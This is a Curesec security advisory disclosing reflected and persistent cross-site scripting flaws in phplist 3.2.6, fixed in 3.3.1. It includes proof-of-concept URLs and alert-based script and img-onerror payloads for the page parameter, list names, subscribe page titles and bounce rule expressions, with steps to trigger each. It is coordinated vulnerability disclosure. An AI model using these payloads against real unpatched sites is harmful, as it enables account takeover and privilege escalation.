Security Advisory - Curesec Research Team 1. Introduction Affected phplist 3.2.6 Product: Fixed in: 3.3.1 Fixed Version https://sourceforge.net/projects/phplist/files/phplist/3.3.1/ Link: phplist-3.3.1.zip/download Vendor Website: https://www.phplist.org/ Vulnerability XSS Type: Remote Yes Exploitable: Reported to 01/10/2017 vendor: Disclosed to 02/20/2017 public: Release mode: Coordinated Release CVE: n/a (not requested) Credits Tim Coen of Curesec GmbH 2. Overview phplist is an application to manage newsletters, written in PHP. In version 3.2.6, it is vulnerable to Cross Site Scripting. The application contains one reflected XSS, and multiple persistent XSS vulnerabilities. The persistent XSS vulnerabilities are only exploitable by users with specific privileges. 3. Details Reflected XSS CVSS: Medium 6.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N The page parameter is vulnerable to reflected XSS. Proof of Concept: http://localhost/lists/admin/?page=send\'\"><script>alert(8)</script>&id=187&tk =c Persistent XSS CVSS: Medium 5.5 CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N Various components of the administration interface are vulnerable to persistent XSS. While a user account is required to exploit these issues, they may be used by less privileged users to escalate their privileges. Persistent XSS: List Name The name of a list is echoed in various locations without encoding, leading to persistent XSS. An account with the privilege to create a list is required. Add new List: http://localhost/lists/admin/?page=editlist&tk=c as name use : list'"><img src=no onerror=alert(1)> To trigger the payload, visit - Add new subscribers to list: http://localhost/lists/admin/?page=importsimple&list=84&tk =c - Overview of all lists: http://localhost/lists/admin/?page=list&tk=c - List members of list: http://localhost/lists/admin/?page=members&id=3&tk=c - View member (loaded as part of the lists tab): http://localhost/lists/admin/?page= user&id=4 - Creating a Campaign (in step 4): http://localhost/lists/admin/?page =send&id=2&tk=c&tab=Lists Persistent XSS: Subscribe Page Various parameters of the subscribe page - such as the title - are vulnerable to persistent XSS. An account with the privilege to edit the subscribe page is required. Add a new subscribe page: http://localhost/lists/admin/?page=spage as title use: subscribe'"><img src=no onerror=alert(1)> To trigget the payload: - Visit the subscribe page: http://localhost/lists/index.php?p=subscribe&id=1 - Visit the subscribe page overview: http://localhost/lists/admin/?page=spage Persistent XSS: Bounce Rule The expression parameter of bounce rules is vulnerable to persistent XSS. An account with the privilege to edit bounce rules is required. Add a new bounce rule:http://localhost/lists/admin/?page=bouncerules&type= active as regular expression use: test'"&ht;<img src=no onerror=alert(1)&ht; To trigger the payload: - Visit the bounce rule overview: http://localhost/lists/ admin/?page=bouncerules&type=active 4. Solution To mitigate this issue please upgrade at least to version 3.3.1: https://sourceforge.net/projects/phplist/files/phplist/3.3.1/phplist-3.3.1.zip/ download Please note that a newer version might already be available. 5. Report Timeline 01/10/2017 Informed Vendor about Issue 01/16/2017 Vendor confirms 02/15/2017 Asked Vendor to confirm that new release fixes issues 02/15/2017 Vendor confirms 02/20/2017 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/phplist-326-XSS-194.html -- blog: https://www.curesec.com/blog Atom Feed: https://www.curesec.com/blog/feed.xml RSS Feed: https://www.curesec.com/blog/rss.xml tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-StraAe 54 10365 Berlin, Germany